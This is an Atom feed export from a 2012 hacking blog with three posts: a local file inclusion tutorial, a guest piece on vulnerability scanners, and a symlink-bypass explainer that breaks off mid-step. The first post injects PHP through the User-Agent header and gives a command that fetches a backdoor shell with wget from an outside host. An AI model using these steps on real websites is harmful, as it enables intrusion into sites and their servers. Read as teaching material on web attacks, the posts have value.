<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/atom10full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><feed xmlns="http://www.w3.org/2005/Atom" xmlns:openSearch="http://a9.com/-/spec/opensearch/1.1/" xmlns:georss="http://www.georss.org/georss" xmlns:gd="http://schemas.google.com/g/2005" xmlns:thr="http://purl.org/syndication/thread/1.0" xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" gd:etag="W/&quot;CkAESHk8eSp7ImA9WhRUF0k.&quot;"><id>tag:blogger.com,1999:blog-3121270199089759062</id><updated>2012-01-28T00:51:49.771-08:00</updated><category term="Registry hacks" /><category term="Youtube hacks" /><category term="Security Training" /><category term="Security flaws" /><category term="Unix Hacking" /><category term="Footprinting" /><category term="Orkut hacking" /><category term="Duqu" /><category term="contests" /><category term="Xp tricks" /><category term="Wordpress Security" /><category term="VOIP Hacking" /><category term="Google hacks" /><category term="Hack Facebook" /><category term="Hacking News" /><category term="My space hacks" /><category term="Website hacking" /><category term="Backtrack 5" /><category term="Computer hacking" /><category term="Skype" /><category term="PTC Hacking" /><category term="Themes" /><category term="Network Security" /><category term="Parental Control softwares" /><category term="Hardware keyloggers" /><category term="Password Hacking softwares" /><category term="USB Hacking" /><category term="Interviews" /><category term="Cheat and tricks" /><category term="Security Tools" /><category term="Wireless Security" /><category term="Blogging tips" /><category term="Hotmail hacks" /><category term="Russian Crimewares" /><category term="Intermediate Hacking" /><category term="facebook" /><category term="Email hacking" /><category term="Msn hacks" /><category term="Counter Strike Cheats" /><category term="Rafay Baloch Books" /><category term="Others" /><category term="Twitter hacks" /><category term="Metasploit" /><category term="videos" /><category term="Ip address" /><category term="Stuxnet" /><category term="Password Cracking" /><category term="Password recovery" /><category term="Gmail hacks" /><category term="Hack Yahoo" /><category term="Windows 7 hacks" /><category term="Hacking Tools" /><category term="Rapidshare hacks" /><category term="Windows performance tips" /><category term="Hacking basics" /><category term="Hi5 hacks" /><category term="Webserver Security" /><category term="Security tips" /><category term="Telecom Hacking" /><category term="Anonymous web surfing" /><category term="Orkut tricks" /><category term="Data Recovery" /><category term="Reverse Engineering" /><category term="Cracks and Keygens" /><category term="Cellphone hacks" /><category term="Reverting" /><category term="Viruses" /><category term="Data Hiding" /><category term="Browser Exploitation" /><title type="text">Ethical Hacking - Rafayhackingarticles</title><subtitle type="html">Learn How to hack!Get hacking and security tips from expert,Protect yourself from hackers</subtitle><link rel="http://schemas.google.com/g/2005#feed" type="application/atom+xml" href="http://www.rafayhackingarticles.net/feeds/posts/default" /><link rel="alternate" type="text/html" href="http://www.rafayhackingarticles.net/" /><link rel="next" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default?start-index=26&amp;max-results=25&amp;redirect=false&amp;v=2" /><author><name>Rafay Baloch</name><uri>http://www.blogger.com/profile/15944091083959815608</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="21" height="32" src="http://2.bp.blogspot.com/-Oq2sCvNga_8/TkK_2qTfs-I/AAAAAAAABXY/GpgdW28vfHM/s220/226160_10150278468603001_538643000_7900302_426914_n.jpg" /></author><generator version="7.00" uri="http://www.blogger.com">Blogger</generator><openSearch:totalResults>352</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/atom+xml" href="http://feeds.feedburner.com/HackingAndCracking" /><feedburner:info uri="hackingandcracking" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><link rel="license" type="text/html" href="http://creativecommons.org/licenses/by/3.0/" /><logo>http://2.bp.blogspot.com/_fMrF3L8CTmg/S-RW1j1FO1I/AAAAAAAAAbA/0fqDhYt8DLM/S700/RafayHackingarticles+logo.JPG</logo><feedburner:emailServiceId>HackingAndCracking</feedburner:emailServiceId><feedburner:feedburnerHostname>http://feedburner.google.com</feedburner:feedburnerHostname><entry gd:etag="W/&quot;CkUFQX0zfyp7ImA9WhRUFkQ.&quot;"><id>tag:blogger.com,1999:blog-3121270199089759062.post-3404170903012738535</id><published>2012-01-26T12:59:00.000-08:00</published><updated>2012-01-27T10:50:10.387-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-01-27T10:50:10.387-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Website hacking" /><title>Local File Inclusion Vulnerability Demonstration - Shell Upload</title><content type="html">&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-qXaNlpCHx4w/TyG8CzP6DEI/AAAAAAAABxY/gJM4y8Hv0f4/s1600/hacked_skull_image.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="210" src="http://4.bp.blogspot.com/-qXaNlpCHx4w/TyG8CzP6DEI/AAAAAAAABxY/gJM4y8Hv0f4/s200/hacked_skull_image.jpg" width="225" /&gt;&lt;/a&gt;&lt;/div&gt;Local file inclusion is a very popular web application attack, It was very common few years back. However now a days you will rarely find websites vulnerable to this attack. However a single vulnerability can result in&amp;nbsp;getting&amp;nbsp;your website compromised. We have already written an article on &lt;a href="http://www.rafayhackingarticles.net/2010/09/hack-website-using-directory.html"&gt;Directory transversal attack&lt;/a&gt;. Therefore I believe that we need no to go in details about the attack. You might know avinash by now the author of the previous article &lt;b&gt;&lt;a href="http://www.rafayhackingarticles.net/2012/01/january-2012-contest-sponsor-for-rha.html"&gt;How Hackers Are Hacking Into Websites On Shared Hosts&lt;/a&gt;&lt;/b&gt;. However in this article he will demonstrate a local file inclusion vulnerability and he will enhance the attack by uploading a shell on the website.&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
Here are some of the common parameters which are vulnerable to local file inclusion or remote file inclusion attacks.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;index.php?homepage=&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;index.php?page=&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;index.php?index2=&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Requirements:&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;1)&lt;/b&gt;&amp;nbsp;A Vulnerable Website&lt;br /&gt;
&lt;b&gt;2)&lt;/b&gt; Remote shell ( http://www.sh3ll.org/egy.txt )&lt;br /&gt;
&lt;b&gt;3)&lt;/b&gt; User-Agent switcher (&lt;a href="https://addons.mozilla.org/en-US/firefox/addon/user-agent-switcher/"&gt; https://addons.mozilla.org/en-US/firefox...-switcher/&lt;/a&gt; )&lt;br /&gt;
&lt;b&gt;4) &lt;/b&gt;Mozilla Firefox&lt;br /&gt;
&lt;br /&gt;
The first thing which a hacker will do while finding a LFI vulnerability is to locate the /etc/passwd file. This file indicates that a local file inclusion vulnerability is present in the website. The image below explains the whole story&lt;b&gt; “root”&lt;/b&gt; is the username, followed by “x” which happens to be the password, however here it’s shadowed, which means that it’s present is /etc/shadow file. Which is only accessible when you have root privileges.&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-m0UhEVlj7qE/TyG4rpfnXRI/AAAAAAAABwg/tl62U5-NtX4/s1600/1.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="358" src="http://4.bp.blogspot.com/-m0UhEVlj7qE/TyG4rpfnXRI/AAAAAAAABwg/tl62U5-NtX4/s640/1.JPG" width="580" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
Next the hacker will check for /proc/self/environ. So change your path to&lt;b&gt; /proc/self/environ/&lt;/b&gt;. The &lt;b&gt;/proc/self/environ/&lt;/b&gt; page should  look something like this if the file exists, not all sites have it.&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-zUIOjzRgXFo/TyG4ukpM6bI/AAAAAAAABwo/HDPjHn9d-bo/s1600/2.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="340" src="http://2.bp.blogspot.com/-zUIOjzRgXFo/TyG4ukpM6bI/AAAAAAAABwo/HDPjHn9d-bo/s640/2.JPG" width="580" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
Once the local file inclusion vulnerability has been identified , the hacker will try to perform remote code execution and try to  some how to further acesss. This can be done by uploading a PHP backdoor. For that purpose a commonly used tool is Useragent switcher. Which can be downloaded from the link above. &lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-7hIUkXHnRJk/TyG4xvDZn1I/AAAAAAAABww/U3OWWHI-okc/s1600/3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="341" src="http://3.bp.blogspot.com/-7hIUkXHnRJk/TyG4xvDZn1I/AAAAAAAABww/U3OWWHI-okc/s640/3.jpg" width="580" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
The hacker edits the useragent and changes code inside to the user agent to the following:&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&amp;lt;?php phpinfo();?&amp;gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Select your &lt;b&gt;User-Agent in Tools &amp;gt; Default User Agent &amp;gt; PHP Info (Or whatever you User Agent is called)&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-u1-4kTJDK94/TyG4zIsjvpI/AAAAAAAABw4/F-YZditdyv8/s1600/4.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="590" src="http://3.bp.blogspot.com/-u1-4kTJDK94/TyG4zIsjvpI/AAAAAAAABw4/F-YZditdyv8/s640/4.JPG" width="580" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-NmwBcZ4JWWQ/TyG40_336UI/AAAAAAAABxA/1j7JEGYRVds/s1600/5.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="598" src="http://1.bp.blogspot.com/-NmwBcZ4JWWQ/TyG40_336UI/AAAAAAAABxA/1j7JEGYRVds/s640/5.JPG" width="580" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
After refreshing the website, He then&amp;nbsp;searches&amp;nbsp;for the keyword &lt;b&gt;"disable_functions"&lt;/b&gt; (Ctrl+F Search function)&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;disable_functions | no value | no value&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-KFJ77-EyqJ0/TyG43ztFCiI/AAAAAAAABxI/ySrDC8XHPrc/s1600/6.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="378" src="http://4.bp.blogspot.com/-KFJ77-EyqJ0/TyG43ztFCiI/AAAAAAAABxI/ySrDC8XHPrc/s640/6.JPG" width="580" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
The above function tells us that website is vulnerable to remote code execution and now we can upload the PHP backdoor. On the finding that the website is vulnerable he then tries to upload the shell by using the following command:&lt;br /&gt;
&lt;b&gt;&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;&amp;lt;?exec('wget http://www.sh3ll.org/egy.txt -O shell.php');?&amp;gt;&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Where the above code uploads a PHP backdoor in a text form and later renames it to .php. Now the shell has been successfully uploaded.  Once the PHP backdoor has been uploaded it will look like the following:&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-RqS4dxXjIWQ/TyG46VmI33I/AAAAAAAABxQ/1fKuCn_H0P0/s1600/7.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="322" src="http://4.bp.blogspot.com/-RqS4dxXjIWQ/TyG46VmI33I/AAAAAAAABxQ/1fKuCn_H0P0/s640/7.JPG" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;span style="font-family: 'Times New Roman', serif; font-size: 15px; line-height: 17px;"&gt;&lt;b&gt;How To Be Protected?&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-family: 'Times New Roman', serif;"&gt;&lt;span style="font-size: 15px; line-height: 17px;"&gt;We will cover it in our upcoming posts.&amp;nbsp;If you are worried about your website's security and would like me to carry out a vulnerability&amp;nbsp;assessment&amp;nbsp;of your website. Feel free to contact me. &amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-family: 'Times New Roman', serif; font-size: 15px; line-height: 17px;"&gt;&lt;b&gt;About the Author:&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-family: 'Times New Roman', serif; font-size: 15px; line-height: 17px;"&gt;Avinash is a security researcher and a blogger. He runs a blog&amp;nbsp;&lt;/span&gt;&lt;a href="http://avisuni.blogspot.com/" style="font-family: 'Times New Roman', serif; font-size: 15px; line-height: 17px;"&gt;http://avisuni.blogspot.com&lt;/a&gt;&lt;span style="font-family: 'Times New Roman', serif; font-size: 15px; line-height: 17px;"&gt;, where he writes about hacking.&amp;nbsp;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3121270199089759062-3404170903012738535?l=www.rafayhackingarticles.net' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=XWwWtZ7jU5w:ZNd6Arh-UMY:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=XWwWtZ7jU5w:ZNd6Arh-UMY:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=XWwWtZ7jU5w:ZNd6Arh-UMY:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=XWwWtZ7jU5w:ZNd6Arh-UMY:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=XWwWtZ7jU5w:ZNd6Arh-UMY:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=XWwWtZ7jU5w:ZNd6Arh-UMY:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=XWwWtZ7jU5w:ZNd6Arh-UMY:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=XWwWtZ7jU5w:ZNd6Arh-UMY:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=XWwWtZ7jU5w:ZNd6Arh-UMY:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=XWwWtZ7jU5w:ZNd6Arh-UMY:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=XWwWtZ7jU5w:ZNd6Arh-UMY:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/HackingAndCracking/~4/XWwWtZ7jU5w" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.rafayhackingarticles.net/feeds/3404170903012738535/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.rafayhackingarticles.net/2012/01/local-file-inclusion-vulnerability.html#comment-form" title="1 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/3404170903012738535?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/3404170903012738535?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/HackingAndCracking/~3/XWwWtZ7jU5w/local-file-inclusion-vulnerability.html" title="Local File Inclusion Vulnerability Demonstration - Shell Upload" /><author><name>Rafay Baloch</name><uri>http://www.blogger.com/profile/15944091083959815608</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="21" height="32" src="http://2.bp.blogspot.com/-Oq2sCvNga_8/TkK_2qTfs-I/AAAAAAAABXY/GpgdW28vfHM/s220/226160_10150278468603001_538643000_7900302_426914_n.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-qXaNlpCHx4w/TyG8CzP6DEI/AAAAAAAABxY/gJM4y8Hv0f4/s72-c/hacked_skull_image.jpg" height="72" width="72" /><thr:total>1</thr:total><feedburner:origLink>http://www.rafayhackingarticles.net/2012/01/local-file-inclusion-vulnerability.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CUEEQ3Y4eyp7ImA9WhRUFU8.&quot;"><id>tag:blogger.com,1999:blog-3121270199089759062.post-940540995269631601</id><published>2012-01-25T12:33:00.000-08:00</published><updated>2012-01-25T12:33:22.833-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-01-25T12:33:22.833-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Website hacking" /><title>How to Make the Best Out Of A Vulnerability Scanner</title><content type="html">&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-iBHtKEV6dgw/TyBlAR2xHTI/AAAAAAAABwI/Vh0DbBfKd-s/s1600/hacker.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="200" src="http://2.bp.blogspot.com/-iBHtKEV6dgw/TyBlAR2xHTI/AAAAAAAABwI/Vh0DbBfKd-s/s200/hacker.jpg" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;As your knowledge and experience in security increases, you start looking at a variety of security solutions that could help you do a better job and automate many of the processes. One of the first products that you would probably test is a vulnerability scanner. That’s an excellent first step but now comes the harder part, if you are new to vulnerability scanning, how do you go about making effective use of this solution?&lt;br /&gt;
Not all vulnerability scanners are the same and some of the functionality mentioned in this article may or may not be available to you; however I recommend that you go for a solution that gives you as wide a range of features as possible.&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;b&gt;Inventory&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Most good vulnerability scanners will keep an eye on the hardware and software deployed on your network. This is very valuable information. Run an inventory on your network to ensure that you are aware of everything that is installed and that it has been approved for use. Once completed set your vulnerability scanner to notify you of any changes from this baseline.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Scheduled scans&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
If your vulnerability scanner allows you to configure a periodic scan, create a schedule to scan your network daily. Select a time that least impacts your organization because a vulnerability scan can be slightly disruptive. &lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Port scanning&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Malware can be stealthy and hide itself in several ways, therefore the more methods in use, the higher the rate of detection. Take note of any open ports each system has and look out for ports that should not be open and investigate further since this may indicate the presence of malware. &lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Patch management&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
A good vulnerability scanner will let you know what patches are missing on your system. Most will also allow you to deploy the patches. Before that, however, it is best practice to set up a testing environment that mirrors your live environment. This test network can be based on the inventory previously obtained using the vulnerability scanner. Test the missing patches on this test environment to ensure that they do not conflict with the current network setup – if all is well deploy them to the live environment.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Other vulnerabilities&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Not all vulnerabilities can be addressed through patch management; some do not have patches available and others are configuration related. A good vulnerability scanner will point these out, give you information on such vulnerabilities and provide you with information on how to address them.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Security policies and software&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
A good vulnerability scanner will outline the security policies set on each of the scanned machines. It will also check if the antivirus software installed is up to date. &lt;br /&gt;
Monitoring these six basic items will ensure you have the necessary information to keep your network secure.&lt;br /&gt;
&lt;br /&gt;
Always keep an eye on hardware and software changes and update the test environment accordingly. Carry out frequent scheduled scans, look out for open ports, and set notifications so that you are informed when a new port is opened. Regularly apply patches and fix any vulnerabilities that are detected as soon as possible. &lt;br /&gt;
&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;This guest post was provided by Emmanuel Carabott on behalf of GFI Software Ltd. GFI is a leading software developer that provides a single source for network administrators to address their network security, content security and messaging need. Learn more on what to look out for when choosing a &lt;a href="http://www.gfi.com/lannetscan"&gt;vulnerability scanner&lt;/a&gt;.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3121270199089759062-940540995269631601?l=www.rafayhackingarticles.net' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=_6sWYfY0_oU:6joLPc-truA:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=_6sWYfY0_oU:6joLPc-truA:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=_6sWYfY0_oU:6joLPc-truA:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=_6sWYfY0_oU:6joLPc-truA:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=_6sWYfY0_oU:6joLPc-truA:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=_6sWYfY0_oU:6joLPc-truA:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=_6sWYfY0_oU:6joLPc-truA:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=_6sWYfY0_oU:6joLPc-truA:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=_6sWYfY0_oU:6joLPc-truA:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=_6sWYfY0_oU:6joLPc-truA:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=_6sWYfY0_oU:6joLPc-truA:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/HackingAndCracking/~4/_6sWYfY0_oU" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.rafayhackingarticles.net/feeds/940540995269631601/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.rafayhackingarticles.net/2012/01/how-to-make-best-out-of-vulnerability.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/940540995269631601?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/940540995269631601?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/HackingAndCracking/~3/_6sWYfY0_oU/how-to-make-best-out-of-vulnerability.html" title="How to Make the Best Out Of A Vulnerability Scanner" /><author><name>Rafay Baloch</name><uri>http://www.blogger.com/profile/15944091083959815608</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="21" height="32" src="http://2.bp.blogspot.com/-Oq2sCvNga_8/TkK_2qTfs-I/AAAAAAAABXY/GpgdW28vfHM/s220/226160_10150278468603001_538643000_7900302_426914_n.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-iBHtKEV6dgw/TyBlAR2xHTI/AAAAAAAABwI/Vh0DbBfKd-s/s72-c/hacker.jpg" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.rafayhackingarticles.net/2012/01/how-to-make-best-out-of-vulnerability.html</feedburner:origLink></entry><entry gd:etag="W/&quot;C0cCQX4-fyp7ImA9WhRUFkw.&quot;"><id>tag:blogger.com,1999:blog-3121270199089759062.post-1528074171168998423</id><published>2012-01-24T13:43:00.000-08:00</published><updated>2012-01-26T12:51:00.057-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-01-26T12:51:00.057-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Security flaws" /><title>How Hackers Are Hacking Into Websites On Shared Hosts - Symlink Bypass Explained</title><content type="html">&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-T4DuSQdxOG0/Tx8lLPoG8XI/AAAAAAAABvw/taSuejh6mGk/s1600/access-denied.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="150" src="http://2.bp.blogspot.com/-T4DuSQdxOG0/Tx8lLPoG8XI/AAAAAAAABvw/taSuejh6mGk/s200/access-denied.jpg" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;You might have noticed a&amp;nbsp;tremendous&amp;nbsp;increase number of hack attacks on wordpress, joomla blogs and other content managing systems. What the hackers are doing is that instead of targeting the CMS itself meaning wordpress or joomla. They are targeting a vulnerable website on a server, Once they gain access to a single vulnerable website on the server, They upload a shell and with a method called &lt;b&gt;"Symlink Bypass". &lt;/b&gt;They manage to extract the configuration files of another website hosted on that same server and later on using a simple MySQL interface they connect to that website.&lt;br /&gt;
&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
Avinash, a security student and researchers will explain step by step how hackers hack into websites on shared host with the method called Symlink bypassing.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;What Is Symlink Bypass?&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Well, I would not like to go into much detail. However for your understanding all you need to know is that symlink is a method to refrence other files and folders on linux. Just like a shortcut in windows. Symlink is necessary in order to make linux work faster. However symlink bypassing is a method which is used to&amp;nbsp;access&amp;nbsp;folders on a server which the user isn't permitted. For example the home directory can only be&amp;nbsp;accessed&amp;nbsp;by a root level user. However with symlink bypass you can touch files inside home directory.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 1 - &lt;/b&gt;The hackers searches for a vunerable website on a server. A hacker can get list of domains on a webserver by doing a reverse iP lookup.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 2 -&lt;/b&gt; Next the hacker hacks into any vulnerable website on the server and upload a PHP shell.&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-HFWiUdIBrm0/Tx8fxaU4NaI/AAAAAAAABtw/3bOACV8eaAA/s1600/1.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="333" src="http://2.bp.blogspot.com/-HFWiUdIBrm0/Tx8fxaU4NaI/AAAAAAAABtw/3bOACV8eaAA/s640/1.JPG" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;b&gt;Step 3 - &lt;/b&gt;The above picture demonstrates two files one named .htacess and the second named jaugar.izri being uploaded to the server. Here is what Jaugar.izri looks like when it's made public by adding 0755 permissions.&lt;br /&gt;
&lt;br /&gt;
